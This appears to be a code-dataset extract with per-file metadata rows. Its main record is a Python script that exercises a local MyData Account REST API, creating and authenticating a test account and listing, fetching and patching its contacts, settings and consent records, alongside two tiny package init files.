    @details.setter
    def details(self, details: "FileUploadDetails"):
        self._attrs["details"] = details.to_dict()

    @property
    def message(self) -> "str":
        """str: human-readable message, or None when unset."""
        return self._attrs.get("message")

    @message.setter
    def message(self, message: "str"):
        self._attrs["message"] = message

    def to_dict(self):
        """Return a plain dict of every attribute whose value is not None."""
        return {k: v for (k, v) in self._attrs.items() if v is not None}
| 34.964266
| 439
| 0.630716
| 8,010
| 64,579
| 4.967166
| 0.035206
| 0.062432
| 0.020811
| 0.026139
| 0.914369
| 0.890014
| 0.869254
| 0.824164
| 0.814512
| 0.811345
| 0
| 0.000513
| 0.274873
| 64,579
| 1,846
| 440
| 34.983207
| 0.849107
| 0.42119
| 0
| 0.860728
| 0
| 0
| 0.107523
| 0.011736
| 0
| 0
| 0
| 0
| 0
| 1
| 0.245922
| false
| 0
| 0.006274
| 0.015056
| 0.397742
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
62384ecd02e0d5717f7ccd3b1e70648001b4aa8a
| 31,510
|
py
|
Python
|
Account/operator_emulator/ui_emulator.py
|
fititnt/mydata-sdk
|
19d7a2ddbc3b5a05665539fbcc7f461c13793e03
|
[
"MIT"
] | null | null | null |
Account/operator_emulator/ui_emulator.py
|
fititnt/mydata-sdk
|
19d7a2ddbc3b5a05665539fbcc7f461c13793e03
|
[
"MIT"
] | 2
|
2018-04-20T23:07:01.000Z
|
2018-04-21T01:01:20.000Z
|
Account/operator_emulator/ui_emulator.py
|
fititnt/mydata-sdk--hiit
|
19d7a2ddbc3b5a05665539fbcc7f461c13793e03
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Minimum viable account - MyData Operator UI Emulator
__author__ = "Jani Yli-Kantola"
__copyright__ = "Digital Health Revolution (c) 2016"
__credits__ = ["Harri Hirvonsalo", "Aleksi Palomäki"]
__license__ = "MIT"
__version__ = "0.0.1"
__maintainer__ = "Jani Yli-Kantola"
__contact__ = "https://github.com/HIIT/mydata-stack"
__status__ = "Development"
__date__ = 12.8.2016
"""
from uuid import uuid4
import requests
import time
from requests.auth import HTTPBasicAuth
import json
# Accumulates one human-readable status line per request; dumped as the
# final report at the end of the script.
request_statuses = []

# Account service location.
account_ip = "http://127.0.0.1"
account_port = "8080"
account_host = account_ip+":"+account_port
headers = {'Content-Type': 'application/json'}

# IDs filled in by the responses as the script progresses.
account_id = ""
particular_id = ""
contacts_id = ""

# When both predefined credentials are non-empty (as here), account
# creation is skipped and these are used to authenticate instead.
predefined_account_username = "testUser"
predefined_account_password = "Hello"

# Randomized credentials used only when a fresh account is created.
username = "example_username-" + str(uuid4())
password = "example_password"

# JSON:API-style payload for POST /api/accounts/.
# NOTE(review): 'examlpe.org' looks like a typo for 'example.org' —
# harmless for emulator data, but confirm before reusing elsewhere.
account_template = {
    "data": {
        "type": "Account",
        "attributes": {
            'firstName': 'ExampleFirstName',
            'lastName': 'ExampleLastName',
            'dateOfBirth': '2010-05-14',
            'email': username + '@examlpe.org',
            'username': username,
            'password': password,
            'acceptTermsOfService': 'True'
        }
    }
}

# PATCH payload for the particulars endpoint ('id' is injected later).
particular_template_for_patch = {
    "data": {
        "type": "Particular",
        "attributes": {
            'lastname': 'NewExampleLastName'
        }
    }
}

# POST payload for the contacts endpoint.
contact_template = {
    "data": {
        "type": "Contact",
        "attributes": {
            'address1': 'Example address 1',
            'address2': 'Example address 2',
            'postalCode': '97584',
            'city': 'Example city',
            'state': 'Example state',
            'country': 'Example country',
            'type': 'Personal',
            'primary': 'True'
        }
    }
}

# PATCH payload for the contacts endpoint ('id' is injected later).
contact_template_for_patch = {
    "data": {
        "type": "Contact",
        "attributes": {
            'address1': 'Example address 1',
            'address2': 'Example address 2',
            'postalCode': '65784',
            'city': 'Example city',
            'state': 'Example state',
            'country': 'Example country',
            'type': 'Personal',
            'primary': 'False'
        }
    }
}

# POST payload for the emails endpoint.
email_template = {
    "data": {
        "type": "Email",
        "attributes": {
            'email': 'erkki@example.com',
            'type': 'Personal',
            'primary': 'True'
        }
    }
}

# PATCH payload for the emails endpoint ('id' is injected later).
email_template_for_patch = {
    "data": {
        "type": "Email",
        "attributes": {
            'email': 'pasi@example.org',
            'type': 'School',
            'primary': 'False'
        }
    }
}

# POST payload for the telephones endpoint.
telephone_template = {
    "data": {
        "type": "Telephone",
        "attributes": {
            'tel': '0501234567',
            'type': 'Personal',
            'primary': 'True'
        }
    }
}

# PATCH payload for the telephones endpoint ('id' is injected later).
telephone_template_for_patch = {
    "data": {
        "type": "Telephone",
        "attributes": {
            'tel': '+358 50 123 4567',
            'type': 'School',
            'primary': 'False'
        }
    }
}

# POST payload for the settings endpoint.
setting_template = {
    "data": {
        "type": "Setting",
        "attributes": {
            'key': 'lang',
            'value': 'fi'
        }
    }
}

# PATCH payload for the settings endpoint ('id' is injected later).
setting_template_for_patch = {
    "data": {
        "type": "Setting",
        "attributes": {
            'key': 'lang',
            'value': 'se'
        }
    }
}
def post(host=None, endpoint=None, headers=None, data=None):
    """Send a POST request and return (status_code, response_body).

    :param host: base URL, e.g. "http://127.0.0.1:8080"
    :param endpoint: path appended to host
    :param headers: dict of HTTP headers
    :param data: JSON-serializable request body
    :raises AttributeError: if any argument is missing
    :return: tuple of (status code as str, parsed JSON body — or the
             repr() of the raw text when the body is not valid JSON)
    """
    # Validate in the same order the caller supplied the parameters.
    for name, value in (("host", host), ("endpoint", endpoint),
                        ("headers", headers), ("data", data)):
        if value is None:
            raise AttributeError("Provide " + name + " as parameter")
    url = host + endpoint
    print("Endpoint: " + endpoint)
    print("Headers: " + json.dumps(headers))
    print("Payload: " + json.dumps(data))
    response = requests.post(url, headers=headers, json=data)
    status_code = str(response.status_code)
    print("Response status: " + str(response.status_code))
    try:
        response_data = json.loads(response.text)
    except Exception as err:
        # Non-JSON body: log the failure and fall back to the raw text repr.
        print(repr(err))
        print("req.text: " + repr(response.text))
        response_data = repr(response.text)
    return status_code, response_data
def patch(host=None, endpoint=None, headers=None, data=None):
    """Send a PATCH request and return (status_code, response_body).

    :param host: base URL, e.g. "http://127.0.0.1:8080"
    :param endpoint: path appended to host
    :param headers: dict of HTTP headers
    :param data: JSON-serializable request body
    :raises AttributeError: if any argument is missing
    :return: tuple of (status code as str, parsed JSON body — or the
             repr() of the raw text when the body is not valid JSON)
    """
    # Validate in the same order the caller supplied the parameters.
    for name, value in (("host", host), ("endpoint", endpoint),
                        ("headers", headers), ("data", data)):
        if value is None:
            raise AttributeError("Provide " + name + " as parameter")
    url = host + endpoint
    print("Endpoint: " + endpoint)
    print("Headers: " + json.dumps(headers))
    print("Payload: " + json.dumps(data))
    response = requests.patch(url, headers=headers, json=data)
    status_code = str(response.status_code)
    print("Response status: " + str(response.status_code))
    try:
        response_data = json.loads(response.text)
    except Exception as err:
        # Non-JSON body: log the failure and fall back to the raw text repr.
        print(repr(err))
        print("req.text: " + repr(response.text))
        response_data = repr(response.text)
    return status_code, response_data
def get(host=None, endpoint=None, headers=None, username=None, password=None):
    """Send a GET request and return (status_code, response_body).

    :param host: base URL, e.g. "http://127.0.0.1:8080"
    :param endpoint: path appended to host
    :param headers: dict of HTTP headers
    :param username: optional HTTP Basic Auth user; auth is only used
                     when BOTH username and password are given
    :param password: optional HTTP Basic Auth password
    :raises AttributeError: if host, endpoint, or headers is missing
    :return: tuple of (status code as str, parsed JSON body — or the
             repr() of the raw text when the body is not valid JSON)
    """
    # Validate in the same order the caller supplied the parameters.
    for name, value in (("host", host), ("endpoint", endpoint),
                        ("headers", headers)):
        if value is None:
            raise AttributeError("Provide " + name + " as parameter")
    url = host + endpoint
    print("Endpoint: " + endpoint)
    print("Headers: " + json.dumps(headers))
    if username is not None and password is not None:
        response = requests.get(url, headers=headers,
                                auth=HTTPBasicAuth(username=username, password=password))
    else:
        response = requests.get(url, headers=headers)
    status_code = str(response.status_code)
    print("Response status: " + str(response.status_code))
    try:
        response_data = json.loads(response.text)
    except Exception as err:
        # Non-JSON body: log the failure and fall back to the raw text repr.
        print(repr(err))
        print("req.text: " + repr(response.text))
        response_data = repr(response.text)
    return status_code, response_data
# ---------------------------------------------------------------------------
# Actions: walk every Account API resource in order, logging each request's
# outcome into request_statuses and printing a report at the end.
# ---------------------------------------------------------------------------

##################################
# Create Account and Authenticate
##################################
label = "# \n# Create Account and Authenticate \n#################################"
print(label)
request_statuses.append(label)

# A fresh account is created only when no predefined credentials are set.
if not predefined_account_username and not predefined_account_password:
    title = "Create Account"
    print(title)
    try:
        account = post(host=account_host, endpoint="/api/accounts/", headers=headers, data=account_template)
    except Exception as exp:
        print(title + ": " + repr(exp))
        request_response = title + ": " + repr(exp)
        request_statuses.append(request_response)
        raise
    else:
        request_response = title + ": " + account[0] + ": " + json.dumps(account[1])
        print('request_response: ' + request_response)
        request_statuses.append(request_response)
        account_id = str(account[1]['data'].get("id", "None"))
        print("Response " + account[0] + ": " + json.dumps(account[1]))
        print("Account ID: " + account_id)
else:
    print("Using predefined account")
    username = predefined_account_username
    password = predefined_account_password

# Authenticate and pick up the Api-Key used by every later request.
print("------------------------------------")
title = "Authenticate"
print(title)
try:
    api_auth = get(host=account_host, endpoint="/api/auth/user/", headers=headers, username=username, password=password)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + api_auth[0] + ": " + json.dumps(api_auth[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    apikey = str(api_auth[1].get("Api-Key", "None"))
    account_id = str(api_auth[1].get("account_id", "None"))
    headers['Api-Key'] = apikey
    print("Response " + api_auth[0] + ": " + json.dumps(api_auth[1]))
    print("apikey: " + apikey)

##################################
# PARTICULARS: list, fetch one, patch
##################################
label = "# \n# PARTICULARS \n#################################"
print(label)
request_statuses.append(label)

title = "List Particulars"
print(title)
try:
    entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/particulars/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    particular_id = str(entries[1]['data'][0].get("id", "None"))
    print("Response " + entries[0] + ": " + json.dumps(entries[1]))
    print("particular_id: " + particular_id)

print("------------------------------------")
title = "One Particular"
print(title)
try:
    entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/particulars/" + particular_id + "/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + entry[0] + ": " + json.dumps(entry[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    print("Response " + entry[0] + ": " + json.dumps(entry[1]))
    print("particular_id: " + str(entry[1]['data'].get("id", "None")))

print("------------------------------------")
title = "Patch Particular"
print(title)
try:
    # The PATCH body must carry the id of the resource being updated.
    particular_template_for_patch['data']['id'] = str(particular_id)
    updated_entry = patch(host=account_host, endpoint="/api/accounts/" + account_id + "/particulars/" + particular_id + "/", headers=headers, data=particular_template_for_patch)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + updated_entry[0] + ": " + json.dumps(updated_entry[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    print("Response " + updated_entry[0] + ": " + json.dumps(updated_entry[1]))

##################################
# CONTACTS: add, list, fetch one, patch
##################################
label = "# \n# CONTACTS \n#################################"
print(label)
request_statuses.append(label)

title = "Add Contact"
print(title)
try:
    new_entry = post(host=account_host, endpoint="/api/accounts/" + account_id + "/contacts/", headers=headers, data=contact_template)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + new_entry[0] + ": " + json.dumps(new_entry[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    print("Response " + new_entry[0] + ": " + json.dumps(new_entry[1]))

print("------------------------------------")
title = "List Contacts"
print(title)
try:
    entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/contacts/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    contacts_id = str(entries[1]['data'][0].get("id", "None"))
    print("Response " + entries[0] + ": " + json.dumps(entries[1]))
    print("contacts_id: " + contacts_id)

print("------------------------------------")
title = "One Contact"
print(title)
try:
    entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/contacts/" + contacts_id + "/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
    print("Response " + entry[0] + ": " + json.dumps(entry[1]))
    print("contacts_id: " + str(entry[1]['data'].get("id", "None")))

print("------------------------------------")
title = "Patch Contact"
print(title)
try:
    contact_template_for_patch['data']['id'] = str(contacts_id)
    updated_entry = patch(host=account_host, endpoint="/api/accounts/" + account_id + "/contacts/" + contacts_id + "/", headers=headers, data=contact_template_for_patch)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + updated_entry[0] + ": " + json.dumps(updated_entry[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    print("Response " + updated_entry[0] + ": " + json.dumps(updated_entry[1]))

##################################
# EMAIL: add, list, fetch one, patch
##################################
label = "# \n# EMAIL \n#################################"
print(label)
request_statuses.append(label)

title = "Add Email"
print(title)
try:
    new_entry = post(host=account_host, endpoint="/api/accounts/" + account_id + "/emails/", headers=headers, data=email_template)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + new_entry[0] + ": " + json.dumps(new_entry[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    print("Response " + new_entry[0] + ": " + json.dumps(new_entry[1]))

print("------------------------------------")
title = "List Emails"
print(title)
try:
    entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/emails/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    email_id = str(entries[1]['data'][0].get("id", "None"))
    print("Response " + entries[0] + ": " + json.dumps(entries[1]))
    print("email_id: " + email_id)

print("------------------------------------")
title = "One Email"
print(title)
try:
    entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/emails/" + email_id + "/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
    print("Response " + entry[0] + ": " + json.dumps(entry[1]))
    print("email_id: " + str(entry[1]['data'].get("id", "None")))

print("------------------------------------")
title = "Patch Email"
print(title)
try:
    email_template_for_patch['data']['id'] = str(email_id)
    updated_entry = patch(host=account_host, endpoint="/api/accounts/" + account_id + "/emails/" + email_id + "/", headers=headers, data=email_template_for_patch)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + updated_entry[0] + ": " + json.dumps(updated_entry[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    print("Response " + updated_entry[0] + ": " + json.dumps(updated_entry[1]))

##################################
# TELEPHONE: add, list, fetch one, patch
##################################
label = "# \n# TELEPHONE \n#################################"
print(label)
request_statuses.append(label)

title = "Add Telephone"
print(title)
try:
    new_entry = post(host=account_host, endpoint="/api/accounts/" + account_id + "/telephones/", headers=headers, data=telephone_template)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + new_entry[0] + ": " + json.dumps(new_entry[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    print("Response " + new_entry[0] + ": " + json.dumps(new_entry[1]))

print("------------------------------------")
title = "List Telephones"
print(title)
try:
    entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/telephones/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    telephones_id = str(entries[1]['data'][0].get("id", "None"))
    print("Response " + entries[0] + ": " + json.dumps(entries[1]))
    print("telephones_id: " + telephones_id)

print("------------------------------------")
title = "One Telephone"
print(title)
try:
    entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/telephones/" + telephones_id + "/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
    print("Response " + entry[0] + ": " + json.dumps(entry[1]))
    print("telephones_id: " + str(entry[1]['data'].get("id", "None")))

print("------------------------------------")
title = "Patch Telephone"
print(title)
try:
    telephone_template_for_patch['data']['id'] = str(telephones_id)
    updated_entry = patch(host=account_host, endpoint="/api/accounts/" + account_id + "/telephones/" + telephones_id + "/", headers=headers, data=telephone_template_for_patch)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + updated_entry[0] + ": " + json.dumps(updated_entry[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    print("Response " + updated_entry[0] + ": " + json.dumps(updated_entry[1]))

##################################
# SETTINGS: add, list, fetch one, patch
##################################
label = "# \n# SETTINGS \n#################################"
print(label)
request_statuses.append(label)

title = "Add Setting"
print(title)
try:
    new_entry = post(host=account_host, endpoint="/api/accounts/" + account_id + "/settings/", headers=headers, data=setting_template)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + new_entry[0] + ": " + json.dumps(new_entry[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    print("Response " + new_entry[0] + ": " + json.dumps(new_entry[1]))

print("------------------------------------")
title = "List Settings"
print(title)
try:
    entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/settings/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    settings_id = str(entries[1]['data'][0].get("id", "None"))
    print("Response " + entries[0] + ": " + json.dumps(entries[1]))
    print("settings_id: " + settings_id)

print("------------------------------------")
title = "One Setting"
print(title)
try:
    entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/settings/" + settings_id + "/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
    print("Response " + entry[0] + ": " + json.dumps(entry[1]))
    print("settings_id: " + str(entry[1]['data'].get("id", "None")))

print("------------------------------------")
title = "Patch Setting"
print(title)
try:
    setting_template_for_patch['data']['id'] = str(settings_id)
    updated_entry = patch(host=account_host, endpoint="/api/accounts/" + account_id + "/settings/" + settings_id + "/", headers=headers, data=setting_template_for_patch)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + updated_entry[0] + ": " + json.dumps(updated_entry[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    print("Response " + updated_entry[0] + ": " + json.dumps(updated_entry[1]))

##################################
# EVENT LOGS
##################################
# The original script carried a disabled (commented-out) section here that
# listed /logs/events/ and fetched one event; it remains disabled —
# presumably pending server-side support. Re-add following the pattern of
# the sections above if/when the endpoint is available.

##################################
# Service Link Records
##################################
label = "# \n# Service Link Records \n#################################"
print(label)
request_statuses.append(label)

print("------------------------------------")
title = "Service Link Records"
print(title)
try:
    entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    slr_id = str(entries[1]['data'][0].get("id", "None"))
    print("Response " + entries[0] + ": " + json.dumps(entries[1]))
    print("slr_id: " + slr_id)

print("------------------------------------")
title = "One Service Link Record"
print(title)
try:
    entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/" + slr_id + "/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
    print("Response " + entry[0] + ": " + json.dumps(entry[1]))
    print("slr_id: " + str(entry[1]['data'].get("id", "None")))

##################################
# Service Link Status Records
##################################
label = "# \n# Service Link Status Records \n#################################"
print(label)
request_statuses.append(label)

print("------------------------------------")
title = "Service Link Status Records"
print(title)
try:
    entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/" + slr_id + "/statuses/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    slsr_id = str(entries[1]['data'][0].get("id", "None"))
    print("Response " + entries[0] + ": " + json.dumps(entries[1]))
    print("slsr_id: " + slsr_id)

print("------------------------------------")
title = "One Service Link Status Record"
print(title)
try:
    entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/" + slr_id + "/statuses/" + slsr_id + "/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
    print("Response " + entry[0] + ": " + json.dumps(entry[1]))
    print("slsr_id: " + str(entry[1]['data'].get("id", "None")))

##################################
# Consent Records
##################################
label = "# \n# Consent Records \n#################################"
print(label)
request_statuses.append(label)

print("------------------------------------")
title = "Consent Records"
print(title)
try:
    entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/" + slr_id + "/consents/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    cr_id = str(entries[1]['data'][0].get("id", "None"))
    print("Response " + entries[0] + ": " + json.dumps(entries[1]))
    print("cr_id: " + cr_id)

print("------------------------------------")
title = "One Consent Record"
print(title)
try:
    entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/" + slr_id + "/consents/" + cr_id + "/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
    print("Response " + entry[0] + ": " + json.dumps(entry[1]))
    print("cr_id: " + str(entry[1]['data'].get("id", "None")))

##################################
# Consent Status Records
##################################
label = "# \n# Consent Status Records \n#################################"
print(label)
request_statuses.append(label)

print("------------------------------------")
title = "Consent Status Records"
print(title)
try:
    entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/" + slr_id + "/consents/" + cr_id + "/statuses/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    csr_id = str(entries[1]['data'][0].get("id", "None"))
    print("Response " + entries[0] + ": " + json.dumps(entries[1]))
    print("csr_id: " + csr_id)

print("------------------------------------")
title = "One Consent Status Record"
print(title)
try:
    entry = get(host=account_host, endpoint="/api/accounts/" + account_id + "/servicelinks/" + slr_id + "/consents/" + cr_id + "/statuses/" + csr_id + "/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    # This section also logs the id into the report, unlike the other
    # single-record fetches above.
    request_statuses.append(title + ": " + entry[0] + ": " + json.dumps(entry[1]))
    request_statuses.append("csr_id: " + str(entry[1]['data'].get("id", "None")))
    print("Response " + entry[0] + ": " + json.dumps(entry[1]))
    print("csr_id: " + str(entry[1]['data'].get("id", "None")))

##################################
# Export Account
##################################
label = "# \n# Account Export \n#################################"
print(label)
request_statuses.append(label)

print("------------------------------------")
title = "Account Export"
print(title)
try:
    entries = get(host=account_host, endpoint="/api/accounts/" + account_id + "/export/", headers=headers)
except Exception as exp:
    print(title + ": " + repr(exp))
    request_response = title + ": " + repr(exp)
    request_statuses.append(request_response)
    raise
else:
    request_response = title + ": " + entries[0] + ": " + json.dumps(entries[1])
    print('request_response: ' + request_response)
    request_statuses.append(request_response)
    print("Response " + entries[0] + ": " + json.dumps(entries[1]))

#################################
# REPORT: dump every collected status line.
#################################
print("=====================================")
print("Request report")
for request in request_statuses:
    print(request)
| 34.550439
| 177
| 0.585814
| 3,406
| 31,510
| 5.254257
| 0.056078
| 0.130755
| 0.090355
| 0.067948
| 0.849799
| 0.82253
| 0.804817
| 0.791965
| 0.787383
| 0.758941
| 0
| 0.009238
| 0.185846
| 31,510
| 911
| 178
| 34.588364
| 0.688353
| 0.066455
| 0
| 0.707801
| 0
| 0
| 0.203396
| 0.045498
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004255
| false
| 0.012766
| 0.007092
| 0
| 0.015603
| 0.266667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
625e76f051cc95f3c0cf8e882023e1bab40245d3
| 53
|
py
|
Python
|
module/__init__.py
|
abhinavg97/baseline_simpletransformers_classification
|
178881178b211e321683c1e338bb06e6e334d7fa
|
[
"Unlicense"
] | null | null | null |
module/__init__.py
|
abhinavg97/baseline_simpletransformers_classification
|
178881178b211e321683c1e338bb06e6e334d7fa
|
[
"Unlicense"
] | null | null | null |
module/__init__.py
|
abhinavg97/baseline_simpletransformers_classification
|
178881178b211e321683c1e338bb06e6e334d7fa
|
[
"Unlicense"
] | null | null | null |
#from module import utils
from module import metrics
| 17.666667
| 26
| 0.830189
| 8
| 53
| 5.5
| 0.625
| 0.454545
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150943
| 53
| 2
| 27
| 26.5
| 0.977778
| 0.45283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6261216676c424621c685241922bd58b6cf51592
| 42
|
py
|
Python
|
lib/__init__.py
|
dato2003/Chat-1
|
29d07907eb94609e0f1c43ded45e08c3d82c4f39
|
[
"Apache-2.0"
] | null | null | null |
lib/__init__.py
|
dato2003/Chat-1
|
29d07907eb94609e0f1c43ded45e08c3d82c4f39
|
[
"Apache-2.0"
] | null | null | null |
lib/__init__.py
|
dato2003/Chat-1
|
29d07907eb94609e0f1c43ded45e08c3d82c4f39
|
[
"Apache-2.0"
] | 1
|
2018-08-04T18:37:14.000Z
|
2018-08-04T18:37:14.000Z
|
from . import database
from . import types
| 21
| 22
| 0.785714
| 6
| 42
| 5.5
| 0.666667
| 0.606061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 42
| 2
| 23
| 21
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
